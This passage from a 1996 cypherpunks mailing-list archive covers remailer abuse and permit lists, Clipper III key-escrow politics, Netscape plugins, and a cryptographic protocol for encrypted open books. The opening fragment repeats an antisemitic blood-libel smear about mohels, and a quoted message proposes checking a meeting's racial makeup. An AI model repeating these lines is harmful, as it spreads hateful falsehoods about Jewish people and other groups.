! refregirators.  Must have gone to great pains to preserve the stuff!

Mohels suckle the blood from infants with vino as chaser.

The origion of lycanthropy.

Love,
Qut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 21 May 1996 16:15:37 +0800
To: cypherpunks@toad.com
Subject: Dave Harman
Message-ID: <Pine.OSF.3.91.960520214243.7971A-100000@alpha.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Please,

Do not confuse me with Dave Harman!!!
He is not my evil twin.

Dan Harmon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 21 May 1996 16:13:24 +0800
To: cypherpunks@toad.com
Subject: Byte on E-Money
Message-ID: <199605202149.VAA02924@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   June Byte features "Electric Money," by Udo Flohr. 
 
   He reviews the key areas of security, authentication, 
   anonymity and divisibility; examines the products of 
   DigiCash, DEC, MS, RSA, IBM and others offering E-cash, 
   digital checks, digital bank checks, smart cards and 
   electronic coupons and tokens, with side glances at 
   Europes's CAFE and Oscar. 
 
   Peter Wayner guarantees "How to Make a Million Dollars" by 
   minting electric money. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 21 May 1996 17:26:40 +0800
To: jamesd@echeque.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAS
Message-ID: <9605210205.AA23433@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 20 May 96 at 9:53, jamesd@echeque.com wrote:

> The Australian law is (or was) based on the idea that if you charged
> someone $2500 for eating the flesh of christ, it then becomes
> legitimate for the government to check out whether or not the
> customer was getting actual flesh of Christ. 

Well, although it makes for an expensive steak, it is still quite 
cheap considering that in the days of JC, they did not have 
refregirators.  Must have gone to great pains to preserve the stuff!

Or did I misunderstood a few things?

JFA
Le mur est jaune, la banane est jaune, donc la banane est mure!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 21 May 1996 17:56:17 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <01I4WUETAM528Y5FKU@mbcl.rutgers.edu>
Message-ID: <IlcGMQ600YUz0Z81lh@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-May-96 Re: SEVERE undercapacity,
w.. by "E. ALLEN SMITH"@ocelot. 
>         What countries are noticeable for being anti-Scientology? They would
> appear to be good locations for special-purpose remailer
ultimate-output ends.

Germany is the first one that comes to mind.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 21 May 1996 17:29:22 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <01I4WUETAM528Y5FKU@mbcl.rutgers.edu>
Message-ID: <IlcGOoS00YUzQZ82lP@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-May-96 Re: SEVERE undercapacity,
w.. by "E. ALLEN SMITH"@ocelot. 
>         What countries are noticeable for being anti-Scientology? They would
> appear to be good locations for special-purpose remailer
ultimate-output ends.

Actually, in addition to Germany behind hostile, I believe that a bunch
of Scientos were locked up in Spain recently...

Funny that. I was talking to one of the CoS vice presidents last week,
who told me she just returned from a half year in Spain. :)

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 21 May 1996 16:28:44 +0800
To: cypherpunks@toad.com
Subject: Re: Incorporating
In-Reply-To: <199605201016.DAA26766@netcom23.netcom.com>
Message-ID: <Pine.SV4.3.91.960520221929.1544F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Corporations are creations of the Sovereign; for this reason they have no 
rights. Certainly not a right to Not Act As A Witness Against Oneself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 21 May 1996 17:23:28 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Feds Web Crypto
In-Reply-To: <199605201549.IAA00569@jobe.shell.portal.com>
Message-ID: <4lcGWn200YUzIZ89B3@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-May-96 Feds Web Crypto by
anonymous-remailer@shell 
> Washington Post, May 20, 1996
>  
> Feds on the Web 

Speaking of the Washinton Post, if anyone wants to try out their web
site, which is in beta test right now, go to:

http://www.washingtonpost.com/

Username: wash
Password: post

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Tue, 21 May 1996 19:01:56 +0800
To: cypherpunks@toad.com
Subject: re: "Very Famous Reporter"
Message-ID: <v02140b00adc585ab32a2@[17.128.203.234]>
MIME-Version: 1.0
Content-Type: text/plain


>From a message by Robert Hettinga:

>> I was talking to someone who was talking to someone (have I said this is a
>> rumor yet?) who was solicited for comment by a Very Famous Reporter ...

At a lecture about his recent book, John Markoff, the New York Times'
Silicon Valley reporter, said (and I quote from memory):

"The most dangerous animal on earth is a reporter on deadline."

Martin Minow
minow@apple.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Tue, 21 May 1996 17:51:07 +0800
To: sameer@c2.org
Subject: Re: The Crisis with Remailers
Message-ID: <adc6fd44040210044e8a@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 5/20/96, sameer@c2.org wrote:
>>
>> Another problem with postage in Mixmaster:  the minimum ecash payment is
>> $0.01.  Do we want to charge that much for email?  Need we consider
>> micropayments?
>>
>
>        one cent could well be too low.
>

An interesting problem with anonymous postage is that it is likely to kill
cover traffic generators.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Tue, 21 May 1996 19:17:15 +0800
To: "E. ALLEN SMITH" <ravage@ssz.com
Subject: Re: Remailers & what they get out of it...
Message-ID: <adc6fff406021004f02e@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 PM 5/19/96, E. ALLEN SMITH wrote:
>From:   IN%"ravage@ssz.com"  "Jim Choate" 18-MAY-1996 09:43:06.96
>>To me the biggest problem with the crypto work right now is that not enough
>>professionals are involved. If more remailers and such were initiated as
>>a business there would be legal avenues to explore. Also, in this vain is
>>the apparent lack of support for commercial ventures by developers of such
>>apps as MixMaster (whose license explicity prohibits commercial use).
>
>        It prohibits commercial use? That's silly. Is it a
>holdover from when the idea was to turn Mixmaster into a company?
>

Mixmaster is licensed under the GNU copyleft.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Ono <wmono@direct.ca>
Date: Tue, 21 May 1996 19:33:41 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <ML-1.3.1.832643128.113.don@bay.cs.byu.edu>
Message-ID: <Pine.LNX.3.91.960520222459.1279A-100000@crash.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Don may have written:

> Re: "permitted" list
> 
> Addresses must be hashed. 

That makes sense.  I don't think the processing time is very significant 
here.  Even using somewhere where collisions can be created is not much 
of a problem, as email addresses tend to be picky for syntax.

> Possibly auto-added to the list when mail comes
> from that address.

How would mail spoofing be prevented?  Sending mail with a given From: 
address is laughably trivial, even making Recieved: look feasable is easy. 
Having people PGP-sign their 'add' requests might work, but then anybody
can create any keys with any email address attached to it.  Asking the
remailer operator to verify each key would be unimaginable.  Sending back
acknowlegements suffers from storage problems, processing power problems,
and also makes it significantly easier for traffic analysis.  (One mail
in, one mail out, one mail in, lots of mails out.  Pairs of mails roughly 
corresponding.)

On the whole, I think the idea of 'permit lists' is good, but not one 
that is very workable under the current "structure".

IANACoNE (cryptologist or network expert)


--    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 21 May 1996 19:28:21 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <0lcIFJS00YUzEZ8AMk@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960520223851.489X-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Declan B. McCullagh wrote:

> An alternative I am considering would reduce the utility of the remailer
> while still allowing these "consensual" uses to continue.  Presently the
> remailers deal with abuse via "block lists", sets of addresses that mail
> can't be sent to.  Generally these are created when someone complains
> about some mail they have received.  By setting up blocking, at least
> they will not get harrassing anonymous mail once they have complained.
> But in some cases, as in the case that is causing me headaches now, even
> one message is too much.
> 
> My thought is to turn the block list concept on its head, and make it a
> "permit list".  Simply, the remailer will only send mail to people who
> have voluntarily indicated their willingness to receive it.

How would you know that the message you received is actually from them? I
don't see how this would really help.

I like the "knock-knock" approach, though it would of necessity impose
load. If someone has an anonymous message waiting, send them a simple note
with instructions on how to retrieve it.

 From: Anonymous Remailer <hfinney@shell.portal.com>
 To: random person <somebody@there.com>
 
 An anonymous message is waiting for you. If you wish to receive this
 message, simply send an email message with [some unique string, maybe an
 MD5 hash of the actual message] in the body of a message to
 hfinney@shell.portal.com. The simplest way to do this is to reply to this
 message, quoting this text. 

I certainly think that limiting newsgroup posting would be prudent. It's
inexcusable that it's possible to use anonymous remailers to post
*forgeries* (see the smoking flames cross-posted to alt.syntax.tactical). 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Tue, 21 May 1996 16:53:08 +0800
To: cypherpunks@toad.com
Subject: INFO: Sen. Burns tells White House "Three strikes and you're out"
Message-ID: <199605210251.WAA25215@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _                   
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____ 
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|                                           

	           SENATOR BURNS (R-MT) TELLS THE WHITE HOUSE
             "THREE STRIKES AND YOU'RE OUT" OF THE ENCRYPTION DEBATE
                BURNS SAYS CLIPPER III PLAN IS A "SWING AND A MISS"

                              Date: May 20, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
	Text of press release from Senator Burns (R-MT)
        How to receive crypto-news

-----------------------------------------------------------------------------
NEWS

The hemorrhaging of the White House publicity campaign surrounding the
Clipper III proposal that started in Interactive Week and the House of
Representatives continues today in the Senate.  Earlier today we received
the attached press release from Senator Burns' (R-MT) office.

Although this author has not yet seen the proposal, it is wonderful to
see Congress leading the fight against the White House on this issue.
>From the recent slew of encryption legislation (H.R. 3011, S.1587, &
S.1726), it's clear that Congress understands that the best people in
the world to sort out this issue are the public and industry.  The
three Clipper plans have been hatched by a secretive Executive agency
without considering the needs of the public and industry.

This is the start of a highly-charged tug-of-war between Congress and the
White House over who holds the keys to your privacy: you, or the government?
Congress says you, the White House says the government.  It's crucial that
we support Congress as they go head-to-head with the White House.

Keep an eye out for the first leaks and analyses of the Clipper III report 
that will undoubtedly appear on the net soon.

                                DON'T FORGET!

Senator Patrick Leahy (D-VT) will be on HotWired *THIS WEDNESDAY*, May 22nd
at 4pm EST at http://www.hotwired.com/wiredside/  You can tune in and listen
to the chat with the RealAudio software (http://www.realaudio.com).  You can
ask questions of the Senator through a moderator and get real, immediate
responses.

-----------------------------------------------------------------------------
TEXT OF PRESS RELEASE FROM SENATOR BURNS (R-MT)

[Note that feedback to Senator Burns can be sent via email at 
 conrad_burns@burns.senate.gov    -Shabbir]

     For immediate release:          Contact:                 Matt Raymond
     Monday, May 20, 1996                                   (202) 224-8150
                                                           Randall Popelka
                                                            (202) 224-6137
     
     Burns: Clipper III Strikes Out
     New Clinton Computer "Wiretap" Plan Circulates With Few Changes
     
        WASHINGTON, D.C. _ Montana Senator Conrad Burns today criticized 
     the Clinton administration's latest computer security proposal as yet 
     another government-driven mandate and urged swift passage of Burns' 
     "Pro-CODE" bill, which addresses export of encryption technology and 
     prohibits mandatory decryption-key escrow.  Burns reacted to the 
     circulation of a draft administration proposal entitled "Achieving 
     Privacy, Commerce, Security and Public Safety in the Global 
     Information Infrastructure."
     
        The proposal, dated May 10 and dubbed "Clipper III" by critics, 
     moves toward the loosening and possibly eventual elimination of export 
     controls on encryption technologies, but only if companies and 
     individuals surrender a copy of their code keys to a 
     government-approved third party.
     
        "It's three strikes and you're out at the old ball game, and I 
     would say that the third version of the administration's Clipper Chip 
     proposal is a swing and a miss," Burns said.  "It's time to quit 
     relying on government mandates for what is truly a matter of great 
     concern to the private sector: the expansion of commerce on the 
     Internet and other computer networks.
     
        "The administration has been using export restrictions as a billy 
     club to force American companies into accepting government control 
     over the keys to their computer files and transmissions.  At least 
     this new proposal admits that the current 40-bit limit on exports is 
     outdated and a poor guarantee of electronic security and integrity, 
     but it again operates from the standpoint that the government, and not 
     the private sector, knows best when it comes to key strength and 
     control over those keys.
     
        "We can only stick our heads in the sand for so long.  It is 
     important to point out that the criminals and trouble-makers who are 
     apparently targets of this plan are unlikely to enroll in any 
     key-escrow system.  Law-abiding businesses and individuals would 
     suffer at the hands of this misguided proposal.
     
        "While this may appear to be a compromise of the administration's 
     earlier positions, we have to remember that an executive action can be 
     reversed just as quickly after an election year.  It is crucial that 
     we pass legislation to codify a solution to the administration's 
     current outdated export policies, and to ensure that the government 
     won't force anyone to give up the keys to their computers."
     
-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.
-----------------------------------------------------------------------------
End crypto-news
=============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 21 May 1996 17:55:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <199605201541.LAA17549@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960520230944.4912Q-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Perry E. Metzger wrote:

> 
> Dave Harman writes:
> > Qut may attend the [cypherpunks] meeting to verify the racial
> > compositions of the group.
> 
> Why? You have something against black people?

I think it was Asians which upset him.

> 
> .pm
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 21 May 1996 17:17:43 +0800
To: cypherpunks@toad.com
Subject: Re:  An alternative to remailer shutdowns (fwd)
Message-ID: <199605210413.XAA15795@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From hfinney@shell.portal.com Mon May 20 22:32:43 1996
> Date: Mon, 20 May 1996 20:33:33 -0700
> From: Hal <hfinney@shell.portal.com>
> Message-Id: <199605210333.UAA04650@jobe.shell.portal.com>
> To: cypherpunks@toad.com, ravage@ssz.com
> Subject: Re:  An alternative to remailer shutdowns (fwd)
> 
> I think Jim is right about the knowledge requirement, which although not
> stated explicitly in the statute, has been held by the courts to be an
> essential element.  My point in quoting is more to show an example of the
> kinds of clearly illegal postings which operators have to deal with.
> 

The point I was trying to make was that if this position is the official
position of the FBI then they are guilty of the crime because they posted
the Unabomber Manifesto in toto on their webpage which is accessible
inter-state.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 21 May 1996 18:19:53 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <199605202202.PAA27515@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960520234133.1176A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 20 May 1996, Hal wrote:

> I was contacted by the FBI on Friday due to some threatening mail which
> was apparently sent through my remailer.  According to 18 USC 875(c),
> "Whoever transmits in interstate commerce any communication containing
> any threat to kidnap any person or any threat to injure the person of
> another, shall be fined not more than $1,000 or imprisoned not more
> than five years, or both."  I may not be able to continue operating
> either of my remailers (alumni.caltech.edu and shell.portal.com) for
> much longer due to this kind of abuse.
> [...]
> 
> My thought is to turn the block list concept on its head, and make it a
> "permit list".  Simply, the remailer will only send mail to people who
> have voluntarily indicated their willingness to receive it.  Someone who
> has not sent in a message granting this permission will not be sent
> mail.  For larger forums such as newsgroups and mailing lists, permission
> may be granted by some consensus mechanism.  Most would be blocked, but a
> few like alt.anonymous.messages and the cypherpunks list would be
> permitted, and others could be added if they wished.
> 
> This should hopefully essentially eliminate complaints about abuse,
> much more effectively than the current method of block lists.  People
> who want to test the remailer by sending mail to themselves, as most
> people do when they are learning, can simply register themselves on the
> permit list.  People who want to receive anonymous mail, or participate
> in anonymous mailing lists, can register themselves.  People who want
> to use nyms can register themselves.  People who run other remailers
> can register.  It's all voluntary, and if someone does get some
> objectionable message at least they will know that they granted
> permission.  They can always ask to be taken off the list.

One problem I see with this is that if even one remailer operated using the
block lists instead of permit lists, then every other remailer in the chain
could hypothetically be held accountable for the contents of the message.
This idea of permit lists makes sense, but I am not sure it would really solve
anything.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMaE8jrZc+sv5siulAQGFwwQAprIIgRZKkOuLfYOM4+or6igApgppMm/2
8zMKgQeOPd7bXhbs7hCp4Rg+E1CHZTNsTwE3lmPNBxzDXNIpLxumCVnyXDpvO64Z
ypKxGwjGun9FLFKpDIUP/pVv0oK1oN6Lw8xqeS1Id7RTWAYERAj20R5MRKe7TRL6
FNzPGzPFdRs=
=q4QF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 21 May 1996 19:12:03 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Unix plugins for Netscape (Was: Calling other code in Java applications and applets)
In-Reply-To: <3185E5B6.3EE8@netscape.com>
Message-ID: <31A168B8.235F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <31887DD0.300F@netscape.com>,
> Jeff Weinstein  <jsw@netscape.com> wrote:
> >Ian Goldberg wrote:
> >>
> >> -----BEGIN PGP SIGNED MESSAGE-----
> >>
> >> In article <3187209C.3E5B@netscape.com>,
> >> Jeff Weinstein  <jsw@netscape.com> wrote:
> >> >
> >> >  It might be interesting to make a small plugin that just does some core
> >> >stuff like gathering entropy, mod-exp, and related stuff difficult or too
> >> >slow in java.  I mainly brought it up because people were asking about
> >> >calling native code from java.
> >> >
> >> In an alternate universe in which I didn't have projects to finish, I may
> >> be interested in doing something like this.  However, I haven't been able
> >> to find information on how to write Unix (or preferably portable) plugins.
> >>
> >> Any hints?
> >
> >  You can get the unix plugin SDK from ftp://ftp20.netscape.com/sdk/unix/
> >
> I downloaded this, and I notice you don't have a "makefile.linux".  Is that
> just because no one's bothered to make one, or does Linux Atlas actually
> not support plugins at all?  (Quickly checking the binary...)  I see that
> Linux Atlas is still a.out.  Ick.  That would make supporting plugins
> pretty tough.  If it were in ELF, things would be _way_ easier; in fact,
> I'd probably say trivial (but that's just me).
> 
> I'd venture a guess that most people who have a Linux box sufficiently cool
> to run netscape at all, have the ability to run ELF.  In fact, there are
> probably a lot of people (like everyone who bought Slackware 3.0 or a recent
> RedHat) for which netscape is the _only_ a.out binary on their system.
> 
> The reason I'm pointing this out is (obviously) because Linux is my main
> development platform, and I'd like to be able to try writing plugins
> for things like crypto and ecash.
> 
>    - Ian "Add me to the 'Make an ELF Linux binary!!!' list..."

  Ask and ye shall receive.  3.0b4 for Linux is in elf format.  Sorry, but
I don't know what the deal is with plugins on linux.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 19:43:46 +0800
To: cypherpunks@toad.com
Subject: PROTOCOL: Encrypted Open Books
Message-ID: <adc6b62a1a02100403da@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai wrote:

"There is indeed a short section in the Cyphernomicon about encrypted open
books.  Unfortunately it doesn't describe it in detail, and since the
hks.net archive is down, I can't look up Eric Hughes' original e-mail on
the topic.  If anyone has a copy of it in his personal archive, please
repost it.  I'm sure other people would be interested as well."

Your wish is my command!


>Date: Mon, 16 Aug 93 13:57:51 -0700
>From: Eric Hughes <hughes@soda.berkeley.edu>
>To: cypherpunks@toad.com
>Subject: PROTOCOL: Encrypted Open Books
>Status: OR
>
>Kent Hastings wondered how an offshore bank could provide assurances
>to depositors.  I wondered the same thing a few months ago, and
>started working on what Perry calls the anonymous auditing problem.  I
>have what I consider to be the core of a solution.
>
>All the following protocols and ideas are in the public domain.
>
>The following is long.
>
>My notation here will also be much less formal than I am capable of; I
>don't want to make the uninitiated read TeX.
>
>The basic idea is that summation can be performed encrypted by using
>exponentiation in a finite field.  That is, if I represent an amount x
>by g^x and an amount y by g^y, then I can compute the sum of x and y
>by multiplying g^x and g^y, getting g^(x+y).  Very basic.
>
>So let us take a very simple version of this protocol, which leaves
>out many desiderata.  If a shared funds account, say, has a bunch of
>transactions made on it, then we can publish each of those amounts x_i
>(for the non-TeX'd, underscore means subscript) encrypted as g^(x_i).
>I know what my transaction number, i, is, and what the amount was, so
>I can verify that my transaction appeared in the public list.  We also
>publish the beginning and ending balances, givings use a total
>difference X.  Now anyone can verify that g^X equals g^(Sum_i x_i).
>That is, everyone can verify that the aggregate effect of the
>transactions is what is claimed without revealing the amounts of any
>of them.
>
>What does this protocol reveal?  It reveals the number of transactions
>on each account and thus the total number of transactions.  It is also
>subject to known plaintext attack.  If I get an account on this system
>and make one transaction in each amount, I can decrypt by table lookup
>the whole transaction flow.  The total number of transaction accounts
>is also revealed, or, for a bank, the number of customers.
>
>We can easily solve the known plaintext attack by blinding each
>transaction.  Instead of publishing pairs <i, g^(x_i)>, we have for
>each transaction a blinding factor r_i and publish triples
>
>        <i, g^(x_i + r_i), h^(r_i)>
>
>The notation has grown.  g is a generator of a finite field G, and h
>is a generator of a different finite field H.
>
>We also publish R = Sum_i r_i in addition to X = Sum_i x_i.
>
>What is the public verification procedure?  Basically the same as the
>first case, but in addition taking into account the blinding factors.
>
>Step 1.  Calculate Product_i h^(r_i) and make sure that it equals h^R.
>This validates the blinding factors.
>
>Step 2.  Calculate Product_i g^(x_i + r_i) and make sure that it
>equals g^(X+R).  This, given the validity of the blinding factors,
>validates the actual transactions.
>
>How does this resist known plaintext attack?  Since the blinding
>factors r_i are flatly distributed over their range (caveat! you pick
>the order of G smaller than of H to assure this), the x_i + r_i sum
>acts exactly as a one-time pad to encrypt the amount.  In summary,
>what is going on here is that both the messages (amounts) and the keys
>(the blinding factors) are being sent out as images of one-way
>functions (exponentiations) that preserve exactly the relationships
>that we want.
>
>There's more.  For a real business, we want to keep double entry books
>and not just single entry accounts as above.  By extending the number
>of terms in the transaction, we can do that too.  In double entry
>bookkeeping, the total amounts for each transaction must sum to zero
>over the various accounts being transacted upon; I say this knowing
>that when you print out the information for an accountant you'll have
>to do some sign twiddling for the asset and liability/equity halves of
>the books.  Also, a single transaction may involve more than two
>accounts, even if in practice most involve only two.
>
>The basic idea here is that each transaction is a set of the above
>transactions whose sum must be zero.  So for a transaction i, we publish
>a set of triples, indexed by j,
>
>        < T_i,j, g^( m_i,j + r_i,j ), h^( r_i,j ) >
>
>where the subscripts are doubly indexed and where T_i,j represents the
>account that amount m_i,j is changing.  Now we can perform, on each
>transaction, the following very similar verification procedure for
>each fixed i.
>
>Step 1.  Verify that Product_j h^( r_i,j ) = 1.  This verifies that
>the blinding factors sum to zero.
>
>Step 2.  Verify that Product_j g^( m_i,j + r_i,j ) = 1.  Since the
>blinding factors sum to zero, this ensures that the transaction
>amounts sum to zero.
>
>Not that both of these sums are done over j, not i.  In other words,
>we validate each transaction individually.
>
>Now we also publish aggregate changes in the public accounts just as
>before.  The holders of private accounts know what how their accounts
>have changed.  Then we can use the the single account verification
>method as above to verify that the totals match.  Everyone can verify
>that the public accounts match, and the holders of private accounts
>can verify that they match.
>
>To summarize: The transactions are doubly indexed.  If you group by
>transaction, then you verify that each transaction sums to zero.  If
>you group by account, then you verify that the change in that account
>is as expected, be it public or private.
>
>In the scenario that Kent originally proposed, one of the public
>accounts would be a gold account, which through independent public
>auditing would be verified to be accurate.  I personally would not use
>gold but rather denominate certain accounts in shares of mutual funds,
>which are resistant to the currency inflations of mining and stockpile
>sales.
>
>What information is still being disclosed?  The most worrisome to me
>is that the total number of transactions per account is revealed, that
>is, aggregate activity, but not total money flux.  I have an insight
>that may allow the _account_ to be blinded as well as the amounts, and
>be revealed in aggregate just as the amounts are, but I have not
>worked out the details because I am not fully up to speed on the
>relevant math.
>
>BEGIN BIG MATH
>I only expect a few people to follow the next paragraphs, so if you
>don't understand it, skip it.
>
>Here's the idea.  The modular exponentiation is performed in a finite
>ring.  We choose a ring that has lots of distinct prime ideals of
>sufficiently large order.  To each account we assign one ideal.  We
>represent dollar amounts as elements of this ideal; since the ideal is
>prime, this is straightforward.  The property of the ideal we use is
>that the sum of any two elements of the ideal is also in the ideal.
>Hence by partitioning the ring, we also partition the computation of
>the accounts.  We are blinding the transcations by account because we
>rely on the fact that blinding is not an intra-ideal operation, and
>thus does not preserve that invariant, which would otherwise be
>public.
>
>We must be careful not to allow operations that would result in an
>element which was in the intersection of two ideals.  This requires
>upper bounds both on the transaction amount and on the number of
>transactions per cycle.  There might be rings of order p^n+1 which
>would be suitable for this operations, but I am not sure of the
>security of the discrete log in such cases, except for p=2, in which
>case it is bad.
>
>END OF BIG MATH
>
>The protocol as specified, though, is useful as it stands.  I have not
>specified all the details.  For example the blinding factors should
>likely be created in a cooperative protocol at the point of
>transaction; blinding factors for intra-bank transactions should not
>contain subliminal channels.  Certificates of deposit and withdrawal
>should be tied to the published transaction information.  Etc.
>Remember, this is the core of an idea.
>
>One criticism I do wish to address now.  I don't think it matters if
>the bank manufactures fake transactions.  The customer can reveal the
>sum of all the blinding factors for transactions on that account, in
>public, and can thus prove what should have been there.  Since the
>blinding factors were committed to in public, there is a strong
>assurance that these blinding factors are what they are claimed to be.
>This in itself can be made into an actual proof of liability.  Note
>that even this revelantion does not compromise individual
>transactions.  It only reveals the aggregate value change, which is
>exactly what is at issue with the bank.
>
>On the other hand, all of the bank assets that are held external to
>that organization can be externally audited in the same way.  The
>other institutions that hold money might be persuaded to undertake a
>legal obligation to honor what the encrypted open books say they
>should have; this may not be difficult because they can verify that
>their record of the transactions matches what has been published.
>
>If we use the contents of the encrypted books at the organizational
>boundary points to create suitable legal opbligations, we can mostly
>ignore what goes on inside of the mess of random numbers.  That is,
>even if double books were being kept, the legal obligations created
>should suffice to ensure that everything can be unwound if needed.
>This doesn't prevent networks of corrupt businesses from going down
>all at once, but it does allow networks of honest businesses to
